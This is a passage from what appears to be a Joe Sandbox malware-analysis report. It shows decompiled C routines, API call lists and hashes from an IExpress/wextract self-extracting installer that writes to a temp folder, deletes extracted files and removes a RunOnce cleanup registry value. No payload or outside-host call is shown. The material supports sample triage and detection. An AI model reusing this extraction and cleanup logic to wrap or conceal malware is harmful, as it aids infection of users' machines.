                                                                        0x00a3595c
                                                                        0x00a35963
                                                                        0x00a3596c
                                                                        0x00000000
                                                                        0x00a35972
                                                                        0x00a35974
                                                                        0x00a3597a
                                                                        0x00a3597a
                                                                        0x00a3596c
                                                                        0x00a358f3
                                                                        0x00a35901
                                                                        0x00a35906
                                                                        0x00a3590b
                                                                        0x00a35910
                                                                        0x00a35910
                                                                        0x00a35918

                                                                        APIs
                                                                        • LocalAlloc.KERNEL32(00000040,?,00000001,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,00000000,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,?,00A35534,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00A358E7
                                                                        • CreateFileA.KERNELBASE(00000000,40000000,00000000,00000000,00000001,04000080,00000000,TMP4351$.TMP,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,?,00A35534,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00A35943
                                                                        • LocalFree.KERNEL32(00000000,?,00A35534,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00A3594D
                                                                        • CloseHandle.KERNEL32(00000000,?,00A35534,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00A3595C
                                                                        • GetFileAttributesA.KERNELBASE(C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,?,00A35534,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00A35963
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.396615809.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                        • Associated: 00000000.00000002.396538956.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396668507.0000000000A38000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                                                        Similarity
                                                                        • API ID: FileLocal$AllocAttributesCloseCreateFreeHandle
                                                                        • String ID: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\$TMP4351$.TMP
                                                                        • API String ID: 747627703-3788082193
                                                                        • Opcode ID: b59e9406d4441ca579a135bb5447fe40dee489258b0ceae9af11e404705a6817
                                                                        • Instruction ID: 267931665bcd2474106da9e7d3fbf78272712764ad50bd3e58ace7791300510f
                                                                        • Opcode Fuzzy Hash: b59e9406d4441ca579a135bb5447fe40dee489258b0ceae9af11e404705a6817
                                                                        • Instruction Fuzzy Hash: 42110871B002207BC7249FFD6C4DB9BBE9DDF46360F104615F546D31D1CB70980686A0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 652 a351e5-a3520b call a3468f LocalAlloc 655 a3522d-a3523c call a3468f 652->655 656 a3520d-a35228 call a344b9 call a36285 652->656 662 a35262-a35270 lstrcmpA 655->662 663 a3523e-a35260 call a344b9 LocalFree 655->663 670 a352b0 656->670 664 a35272-a35273 LocalFree 662->664 665 a3527e-a3529c call a344b9 LocalFree 662->665 663->670 668 a35279-a3527c 664->668 674 a352a6 665->674 675 a3529e-a352a4 665->675 672 a352b2-a352b5 668->672 670->672 674->670 675->668
                                                                        C-Code - Quality: 100%
                                                                        			E00A351E5(void* __eflags) {
                                                                        				int _t5;
                                                                        				void* _t6;
                                                                        				void* _t28;
                                                                        
                                                                        				_t1 = E00A3468F("UPROMPT", 0, 0) + 1; // 0x1
                                                                        				_t28 = LocalAlloc(0x40, _t1);
                                                                        				if(_t28 != 0) {
                                                                        					if(E00A3468F("UPROMPT", _t28, _t29) != 0) {
                                                                        						_t5 = lstrcmpA(_t28, "<None>"); // executed
                                                                        						if(_t5 != 0) {
                                                                        							_t6 = E00A344B9(0, 0x3e9, _t28, 0, 0x20, 4);
                                                                        							LocalFree(_t28);
                                                                        							if(_t6 != 6) {
                                                                        								 *0xa39124 = 0x800704c7;
                                                                        								L10:
                                                                        								return 0;
                                                                        							}
                                                                        							 *0xa39124 = 0;
                                                                        							L6:
                                                                        							return 1;
                                                                        						}
                                                                        						LocalFree(_t28);
                                                                        						goto L6;
                                                                        					}
                                                                        					E00A344B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                        					LocalFree(_t28);
                                                                        					 *0xa39124 = 0x80070714;
                                                                        					goto L10;
                                                                        				}
                                                                        				E00A344B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                        				 *0xa39124 = E00A36285();
                                                                        				goto L10;
                                                                        			}






                                                                        0x00a351fb
                                                                        0x00a35207
                                                                        0x00a3520b
                                                                        0x00a3523c
                                                                        0x00a35268
                                                                        0x00a35270
                                                                        0x00a3528b
                                                                        0x00a35293
                                                                        0x00a3529c
                                                                        0x00a352a6
                                                                        0x00a352b0
                                                                        0x00000000
                                                                        0x00a352b0
                                                                        0x00a3529e
                                                                        0x00a35279
                                                                        0x00000000
                                                                        0x00a3527b
                                                                        0x00a35273
                                                                        0x00000000
                                                                        0x00a35273
                                                                        0x00a3524a
                                                                        0x00a35250
                                                                        0x00a35256
                                                                        0x00000000
                                                                        0x00a35256
                                                                        0x00a35219
                                                                        0x00a35223
                                                                        0x00000000

                                                                        APIs
                                                                          • Part of subcall function 00A3468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A346A0
                                                                          • Part of subcall function 00A3468F: SizeofResource.KERNEL32(00000000,00000000,?,00A32D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A346A9
                                                                          • Part of subcall function 00A3468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A346C3
                                                                          • Part of subcall function 00A3468F: LoadResource.KERNEL32(00000000,00000000,?,00A32D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A346CC
                                                                          • Part of subcall function 00A3468F: LockResource.KERNEL32(00000000,?,00A32D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A346D3
                                                                          • Part of subcall function 00A3468F: memcpy_s.MSVCRT ref: 00A346E5
                                                                          • Part of subcall function 00A3468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00A346EF
                                                                        • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00A32F4D,?,00000002,00000000), ref: 00A35201
                                                                        • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00A35250
                                                                          • Part of subcall function 00A344B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A34518
                                                                          • Part of subcall function 00A344B9: MessageBoxA.USER32(?,?,zhiga,00010010), ref: 00A34554
                                                                          • Part of subcall function 00A36285: GetLastError.KERNEL32(00A35BBC), ref: 00A36285
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.396615809.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                        • Associated: 00000000.00000002.396538956.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396668507.0000000000A38000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                                                        Similarity
                                                                        • API ID: Resource$FindFreeLoadLocal$AllocErrorLastLockMessageSizeofStringmemcpy_s
                                                                        • String ID: <None>$UPROMPT
                                                                        • API String ID: 957408736-2980973527
                                                                        • Opcode ID: 13919e0bd3ae0018a0c5ebb719f71c76a682e71fd73d2ed6faf555021a5bd5a6
                                                                        • Instruction ID: 43024a5d285444d10b0369173e3c94a7e712272baea363613710f77f4df18ecb
                                                                        • Opcode Fuzzy Hash: 13919e0bd3ae0018a0c5ebb719f71c76a682e71fd73d2ed6faf555021a5bd5a6
                                                                        • Instruction Fuzzy Hash: DD11C4B1A00601BFE354ABF55D4AFBB61ADEB99380F104439F682E6190DBB9DC025624
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 74%
                                                                        			E00A352B6(void* __ebx, char* __ecx, void* __edi, void* __esi) {
                                                                        				signed int _v8;
                                                                        				char _v268;
                                                                        				signed int _t9;
                                                                        				signed int _t11;
                                                                        				void* _t21;
                                                                        				void* _t29;
                                                                        				CHAR** _t31;
                                                                        				void* _t32;
                                                                        				signed int _t33;
                                                                        
                                                                        				_t28 = __edi;
                                                                        				_t22 = __ecx;
                                                                        				_t21 = __ebx;
                                                                        				_t9 =  *0xa38004; // 0xb6b6972c
                                                                        				_v8 = _t9 ^ _t33;
                                                                        				_push(__esi);
                                                                        				_t31 =  *0xa391e0; // 0x2b99198
                                                                        				if(_t31 != 0) {
                                                                        					_push(__edi);
                                                                        					do {
                                                                        						_t29 = _t31;
                                                                        						if( *0xa38a24 == 0 &&  *0xa39a30 == 0) {
                                                                        							SetFileAttributesA( *_t31, 0x80); // executed
                                                                        							DeleteFileA( *_t31); // executed
                                                                        						}
                                                                        						_t31 = _t31[1];
                                                                        						LocalFree( *_t29);
                                                                        						LocalFree(_t29);
                                                                        					} while (_t31 != 0);
                                                                        					_pop(_t28);
                                                                        				}
                                                                        				_t11 =  *0xa38a20; // 0x0
                                                                        				_pop(_t32);
                                                                        				if(_t11 != 0 &&  *0xa38a24 == 0 &&  *0xa39a30 == 0) {
                                                                        					_push(_t22);
                                                                        					E00A31781( &_v268, 0x104, _t22, "C:\Users\FRONTD~1\AppData\Local\Temp\IXP000.TMP\");
                                                                        					if(( *0xa39a34 & 0x00000020) != 0) {
                                                                        						E00A365E8( &_v268);
                                                                        					}
                                                                        					SetCurrentDirectoryA(".."); // executed
                                                                        					_t22 =  &_v268;
                                                                        					E00A32390( &_v268);
                                                                        					_t11 =  *0xa38a20; // 0x0
                                                                        				}
                                                                        				if( *0xa39a40 != 1 && _t11 != 0) {
                                                                        					_t11 = E00A31FE1(_t22); // executed
                                                                        				}
                                                                        				 *0xa38a20 =  *0xa38a20 & 0x00000000;
                                                                        				return E00A36CE0(_t11, _t21, _v8 ^ _t33, 0x104, _t28, _t32);
                                                                        			}












                                                                        0x00a352b6
                                                                        0x00a352b6
                                                                        0x00a352b6
                                                                        0x00a352c1
                                                                        0x00a352c8
                                                                        0x00a352cb
                                                                        0x00a352cc
                                                                        0x00a352d4
                                                                        0x00a352d6
                                                                        0x00a352d7
                                                                        0x00a352de
                                                                        0x00a352e0
                                                                        0x00a352f2
                                                                        0x00a352fa
                                                                        0x00a352fa
                                                                        0x00a35302
                                                                        0x00a35305
                                                                        0x00a3530c
                                                                        0x00a35312
                                                                        0x00a35316
                                                                        0x00a35316
                                                                        0x00a35317
                                                                        0x00a3531c
                                                                        0x00a3531f
                                                                        0x00a35333
                                                                        0x00a35345
                                                                        0x00a35351
                                                                        0x00a35359
                                                                        0x00a35359
                                                                        0x00a35363
                                                                        0x00a35369
                                                                        0x00a3536f
                                                                        0x00a35374
                                                                        0x00a35374
                                                                        0x00a35381
                                                                        0x00a35387
                                                                        0x00a35387
                                                                        0x00a3538f
                                                                        0x00a353a0

                                                                        APIs
                                                                        • SetFileAttributesA.KERNELBASE(02B99198,00000080,?,00000000), ref: 00A352F2
                                                                        • DeleteFileA.KERNELBASE(02B99198), ref: 00A352FA
                                                                        • LocalFree.KERNEL32(02B99198,?,00000000), ref: 00A35305
                                                                        • LocalFree.KERNEL32(02B99198), ref: 00A3530C
                                                                        • SetCurrentDirectoryA.KERNELBASE(00A311FC,?,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\), ref: 00A35363
                                                                        Strings
                                                                        • C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\, xrefs: 00A35334
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.396615809.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                        • Associated: 00000000.00000002.396538956.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396668507.0000000000A38000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                                                        Similarity
                                                                        • API ID: FileFreeLocal$AttributesCurrentDeleteDirectory
                                                                        • String ID: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\
                                                                        • API String ID: 2833751637-1955631000
                                                                        • Opcode ID: f4e21fd85950cd3044cdabe494a6f9973adfa8ec9529fba4a931a6a918a6ade7
                                                                        • Instruction ID: 79b550be181c1b18e8b1bb75bf3c907736db71d2f668e934ee2d54f3120ebe16
                                                                        • Opcode Fuzzy Hash: f4e21fd85950cd3044cdabe494a6f9973adfa8ec9529fba4a931a6a918a6ade7
                                                                        • Instruction Fuzzy Hash: 9B21C031D00614DBDB24EBA8ED59BAA77B4BB10790F04025AF8825B1A0CFF49D86DB80
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00A31FE1(void* __ecx) {
                                                                        				void* _v8;
                                                                        				long _t4;
                                                                        				long _t7;
                                                                        
                                                                        				if( *0xa38530 != 0) {
                                                                        					_t4 = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x20006,  &_v8); // executed
                                                                        					if(_t4 == 0) {
                                                                        						RegDeleteValueA(_v8, "wextract_cleanup0"); // executed
                                                                        						_t7 = RegCloseKey(_v8); // executed
                                                                        						return _t7;
                                                                        					}
                                                                        				}
                                                                        				return _t4;
                                                                        			}






                                                                        0x00a31fee
                                                                        0x00a32005
                                                                        0x00a3200d
                                                                        0x00a32017
                                                                        0x00a32020
                                                                        0x00000000
                                                                        0x00a32020
                                                                        0x00a3200d
                                                                        0x00a32029

                                                                        APIs
                                                                        • RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00020006,00A3538C,?,?,00A3538C), ref: 00A32005
                                                                        • RegDeleteValueA.KERNELBASE(00A3538C,wextract_cleanup0,?,?,00A3538C), ref: 00A32017
                                                                        • RegCloseKey.KERNELBASE(00A3538C,?,?,00A3538C), ref: 00A32020
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.396615809.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                        • Associated: 00000000.00000002.396538956.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396668507.0000000000A38000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                                                        Similarity
                                                                        • API ID: CloseDeleteOpenValue
                                                                        • String ID: Software\Microsoft\Windows\CurrentVersion\RunOnce$wextract_cleanup0
                                                                        • API String ID: 849931509-702805525
                                                                        • Opcode ID: 10747b7ffa26ddbfc68813ddcf8283197cf59c836f88a5c09358e90737e0de0a
                                                                        • Instruction ID: 78a3333cc071edb78e823d8e76457d1640b0a656b476cf267df603b55302b290
                                                                        • Opcode Fuzzy Hash: 10747b7ffa26ddbfc68813ddcf8283197cf59c836f88a5c09358e90737e0de0a
                                                                        • Instruction Fuzzy Hash: 98E08631650328BBD729CFD0FD4AF5DBB29F712741F100194F945A00A0EBB55E15D705
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00A347E0(intOrPtr* __ecx) {
                                                                        				void* _t5;
                                                                        				intOrPtr _t6;
                                                                        				intOrPtr _t9;
                                                                        				void* _t11;
                                                                        				void* _t19;
                                                                        				intOrPtr* _t22;
                                                                        				void _t24;
                                                                        				struct HWND__* _t25;
                                                                        				struct HWND__* _t26;
                                                                        				void* _t27;
                                                                        				intOrPtr* _t28;
                                                                        				intOrPtr* _t33;
                                                                        				void* _t34;
                                                                        
                                                                        				_t33 = __ecx; // executed
                                                                        				_t5 = LocalAlloc(0x40, 8); // executed
                                                                        				_t34 = _t5;
                                                                        				if(_t34 != 0) {
                                                                        					_t22 = _t33;
                                                                        					_t27 = _t22 + 1;
                                                                        					do {
                                                                        						_t6 =  *_t22;
                                                                        						_t22 = _t22 + 1;
                                                                        					} while (_t6 != 0);
                                                                        					_t24 = LocalAlloc(0x40, _t22 - _t27 + 1);
                                                                        					 *_t34 = _t24;
                                                                        					if(_t24 != 0) {
                                                                        						_t28 = _t33;
                                                                        						_t19 = _t28 + 1;
                                                                        						do {
                                                                        							_t9 =  *_t28;
                                                                        							_t28 = _t28 + 1;
                                                                        						} while (_t9 != 0);
                                                                        						E00A31680(_t24, _t28 - _t19 + 1, _t33);
                                                                        						_t11 =  *0xa391e0; // 0x2b99198
                                                                        						 *(_t34 + 4) = _t11;
                                                                        						 *0xa391e0 = _t34;
                                                                        						return 1;
                                                                        					}
                                                                        					_t25 =  *0xa38584; // 0x0
                                                                        					E00A344B9(_t25, 0x4b5, _t8, _t8, 0x10, _t8);
                                                                        					LocalFree(_t34);
                                                                        					L2:
                                                                        					return 0;
                                                                        				}
                                                                        				_t26 =  *0xa38584; // 0x0
                                                                        				E00A344B9(_t26, 0x4b5, _t5, _t5, 0x10, _t5);
                                                                        				goto L2;
                                                                        			}
















                                                                        0x00a347e8
                                                                        0x00a347ea
                                                                        0x00a347f0
                                                                        0x00a347f4
                                                                        0x00a3480f
                                                                        0x00a34811
                                                                        0x00a34814
                                                                        0x00a34814
                                                                        0x00a34816
                                                                        0x00a34817
                                                                        0x00a34829
                                                                        0x00a3482b
                                                                        0x00a3482f
                                                                        0x00a3484f
                                                                        0x00a34852
                                                                        0x00a34855
                                                                        0x00a34855
                                                                        0x00a34857
                                                                        0x00a34858
                                                                        0x00a34860
                                                                        0x00a34865
                                                                        0x00a3486a
                                                                        0x00a3486f
                                                                        0x00000000
                                                                        0x00a34876
                                                                        0x00a34831
                                                                        0x00a34841
                                                                        0x00a34847
                                                                        0x00a3480b
                                                                        0x00000000
                                                                        0x00a3480b
                                                                        0x00a347f6
                                                                        0x00a34806
                                                                        0x00000000

                                                                        APIs
                                                                        • LocalAlloc.KERNELBASE(00000040,00000008,?,00000000,00A34E6F), ref: 00A347EA
                                                                        • LocalAlloc.KERNEL32(00000040,?), ref: 00A34823
                                                                        • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000), ref: 00A34847
                                                                          • Part of subcall function 00A344B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A34518
                                                                          • Part of subcall function 00A344B9: MessageBoxA.USER32(?,?,zhiga,00010010), ref: 00A34554
                                                                        Strings
                                                                        • C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\, xrefs: 00A34851
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.396615809.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                        • Associated: 00000000.00000002.396538956.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396668507.0000000000A38000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                                                        Similarity
                                                                        • API ID: Local$Alloc$FreeLoadMessageString
                                                                        • String ID: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\
                                                                        • API String ID: 359063898-1955631000
                                                                        • Opcode ID: 30786d712d3df3820f0db79b300dfdf67cd494825e7d6890eb59f235dae444d3
                                                                        • Instruction ID: 5b2b88394632026a9824392fd5d6eb6e704808561e5dafebad49555437ed6c1f
                                                                        • Opcode Fuzzy Hash: 30786d712d3df3820f0db79b300dfdf67cd494825e7d6890eb59f235dae444d3
                                                                        • Instruction Fuzzy Hash: BE11E5756047416FD754DF749C18F777B6AEB89300F048519FA829B341DA35EC078760
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 94%
                                                                        			E00A34CD0(char* __edx, long _a4, int _a8) {
                                                                        				signed int _v8;
                                                                        				char _v268;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t29;
                                                                        				int _t30;
                                                                        				long _t32;
                                                                        				signed int _t33;
                                                                        				long _t35;
                                                                        				long _t36;
                                                                        				struct HWND__* _t37;
                                                                        				long _t38;
                                                                        				long _t39;
                                                                        				long _t41;
                                                                        				long _t44;
                                                                        				long _t45;
                                                                        				long _t46;
                                                                        				signed int _t50;
                                                                        				long _t51;
                                                                        				char* _t58;
                                                                        				long _t59;
                                                                        				char* _t63;
                                                                        				long _t64;
                                                                        				CHAR* _t71;
                                                                        				CHAR* _t74;
                                                                        				int _t75;
                                                                        				signed int _t76;
                                                                        
                                                                        				_t69 = __edx;
                                                                        				_t29 =  *0xa38004; // 0xb6b6972c
                                                                        				_t30 = _t29 ^ _t76;
                                                                        				_v8 = _t30;
                                                                        				_t75 = _a8;
                                                                        				if( *0xa391d8 == 0) {
                                                                        					_t32 = _a4;
                                                                        					__eflags = _t32;
                                                                        					if(_t32 == 0) {
                                                                        						_t33 = E00A34E99(_t75);
                                                                        						L35:
                                                                        						return E00A36CE0(_t33, _t54, _v8 ^ _t76, _t69, _t73, _t75);
                                                                        					}
                                                                        					_t35 = _t32 - 1;
                                                                        					__eflags = _t35;
                                                                        					if(_t35 == 0) {
                                                                        						L9:
                                                                        						_t33 = 0;
                                                                        						goto L35;
                                                                        					}
                                                                        					_t36 = _t35 - 1;
                                                                        					__eflags = _t36;
                                                                        					if(_t36 == 0) {
                                                                        						_t37 =  *0xa38584; // 0x0
                                                                        						__eflags = _t37;
                                                                        						if(_t37 != 0) {
                                                                        							SetDlgItemTextA(_t37, 0x837,  *(_t75 + 4));
                                                                        						}
                                                                        						_t54 = 0xa391e4;
                                                                        						_t58 = 0xa391e4;
                                                                        						do {
                                                                        							_t38 =  *_t58;
                                                                        							_t58 =  &(_t58[1]);
                                                                        							__eflags = _t38;
                                                                        						} while (_t38 != 0);
                                                                        						_t59 = _t58 - 0xa391e5;
                                                                        						__eflags = _t59;
                                                                        						_t71 =  *(_t75 + 4);
                                                                        						_t73 =  &(_t71[1]);
                                                                        						do {
                                                                        							_t39 =  *_t71;
                                                                        							_t71 =  &(_t71[1]);
                                                                        							__eflags = _t39;
                                                                        						} while (_t39 != 0);
                                                                        						_t69 = _t71 - _t73;
                                                                        						_t30 = _t59 + 1 + _t71 - _t73;
                                                                        						__eflags = _t30 - 0x104;
                                                                        						if(_t30 >= 0x104) {
                                                                        							L3:
                                                                        							_t33 = _t30 | 0xffffffff;
                                                                        							goto L35;
                                                                        						}
                                                                        						_t69 = 0xa391e4;
                                                                        						_t30 = E00A34702( &_v268, 0xa391e4,  *(_t75 + 4));
                                                                        						__eflags = _t30;
                                                                        						if(__eflags == 0) {
                                                                        							goto L3;
                                                                        						}
                                                                        						_t41 = E00A3476D( &_v268, __eflags);
                                                                        						__eflags = _t41;
                                                                        						if(_t41 == 0) {
                                                                        							goto L9;
                                                                        						}
                                                                        						_push(0x180);
                                                                        						_t30 = E00A34980( &_v268, 0x8302); // executed
                                                                        						_t75 = _t30;
                                                                        						__eflags = _t75 - 0xffffffff;
                                                                        						if(_t75 == 0xffffffff) {
                                                                        							goto L3;
                                                                        						}
                                                                        						_t30 = E00A347E0( &_v268);
                                                                        						__eflags = _t30;
                                                                        						if(_t30 == 0) {
                                                                        							goto L3;
                                                                        						}
                                                                        						 *0xa393f4 =  *0xa393f4 + 1;
                                                                        						_t33 = _t75;
                                                                        						goto L35;
                                                                        					}
                                                                        					_t44 = _t36 - 1;
                                                                        					__eflags = _t44;
                                                                        					if(_t44 == 0) {
                                                                        						_t54 = 0xa391e4;
                                                                        						_t63 = 0xa391e4;
                                                                        						do {
                                                                        							_t45 =  *_t63;
                                                                        							_t63 =  &(_t63[1]);
                                                                        							__eflags = _t45;
                                                                        						} while (_t45 != 0);
                                                                        						_t74 =  *(_t75 + 4);
                                                                        						_t64 = _t63 - 0xa391e5;
                                                                        						__eflags = _t64;
                                                                        						_t69 =  &(_t74[1]);
                                                                        						do {
                                                                        							_t46 =  *_t74;
                                                                        							_t74 =  &(_t74[1]);
                                                                        							__eflags = _t46;
                                                                        						} while (_t46 != 0);
                                                                        						_t73 = _t74 - _t69;
                                                                        						_t30 = _t64 + 1 + _t74 - _t69;
                                                                        						__eflags = _t30 - 0x104;
                                                                        						if(_t30 >= 0x104) {
                                                                        							goto L3;
                                                                        						}
                                                                        						_t69 = 0xa391e4;
                                                                        						_t30 = E00A34702( &_v268, 0xa391e4,  *(_t75 + 4));
                                                                        						__eflags = _t30;
                                                                        						if(_t30 == 0) {
                                                                        							goto L3;
                                                                        						}
                                                                        						_t69 =  *((intOrPtr*)(_t75 + 0x18));
                                                                        						_t30 = E00A34C37( *((intOrPtr*)(_t75 + 0x14)),  *((intOrPtr*)(_t75 + 0x18)),  *(_t75 + 0x1a) & 0x0000ffff); // executed
                                                                        						__eflags = _t30;
                                                                        						if(_t30 == 0) {
                                                                        							goto L3;
                                                                        						}
                                                                        						E00A34B60( *((intOrPtr*)(_t75 + 0x14))); // executed
                                                                        						_t50 =  *(_t75 + 0x1c) & 0x0000ffff;
                                                                        						__eflags = _t50;
                                                                        						if(_t50 != 0) {
                                                                        							_t51 = _t50 & 0x00000027;
                                                                        							__eflags = _t51;
                                                                        						} else {
                                                                        							_t51 = 0x80;
                                                                        						}
                                                                        						_t30 = SetFileAttributesA( &_v268, _t51); // executed
                                                                        						__eflags = _t30;
                                                                        						if(_t30 == 0) {
                                                                        							goto L3;
                                                                        						} else {
                                                                        							_t33 = 1;
                                                                        							goto L35;
                                                                        						}
                                                                        					}
                                                                        					_t30 = _t44 - 1;
                                                                        					__eflags = _t30;
                                                                        					if(_t30 == 0) {
                                                                        						goto L3;
                                                                        					}
                                                                        					goto L9;
                                                                        				}
                                                                        				if(_a4 == 3) {
                                                                        					_t30 = E00A34B60( *((intOrPtr*)(_t75 + 0x14)));
                                                                        				}
                                                                        				goto L3;
                                                                        			}































                                                                        0x00a34cd0
                                                                        0x00a34cdb
                                                                        0x00a34ce0
                                                                        0x00a34ce2
                                                                        0x00a34cee
                                                                        0x00a34cf2
                                                                        0x00a34d0e
                                                                        0x00a34d0e
                                                                        0x00a34d11
                                                                        0x00a34e83
                                                                        0x00a34e88
                                                                        0x00a34e98
                                                                        0x00a34e98
                                                                        0x00a34d17
                                                                        0x00a34d17
                                                                        0x00a34d1a
                                                                        0x00a34d2f
                                                                        0x00a34d2f
                                                                        0x00000000
                                                                        0x00a34d2f
                                                                        0x00a34d1c
                                                                        0x00a34d1c
                                                                        0x00a34d1f
                                                                        0x00a34dcb
                                                                        0x00a34dd0
                                                                        0x00a34dd2
                                                                        0x00a34ddd
                                                                        0x00a34ddd
                                                                        0x00a34de3
                                                                        0x00a34de8
                                                                        0x00a34ded
                                                                        0x00a34ded
                                                                        0x00a34def
                                                                        0x00a34df0
                                                                        0x00a34df0
                                                                        0x00a34df4
                                                                        0x00a34df4
                                                                        0x00a34df6
                                                                        0x00a34df9
                                                                        0x00a34dfc
                                                                        0x00a34dfc
                                                                        0x00a34dfe
                                                                        0x00a34dff
                                                                        0x00a34dff
                                                                        0x00a34e03
                                                                        0x00a34e08
                                                                        0x00a34e0a
                                                                        0x00a34e0f
                                                                        0x00a34d03
                                                                        0x00a34d03
                                                                        0x00000000
                                                                        0x00a34d03
                                                                        0x00a34e18
                                                                        0x00a34e20
                                                                        0x00a34e25
                                                                        0x00a34e27
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00a34e33
                                                                        0x00a34e38
                                                                        0x00a34e3a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00a34e40
                                                                        0x00a34e51
                                                                        0x00a34e56
                                                                        0x00a34e5b
                                                                        0x00a34e5e
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00a34e6a
                                                                        0x00a34e6f
                                                                        0x00a34e71
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00a34e77
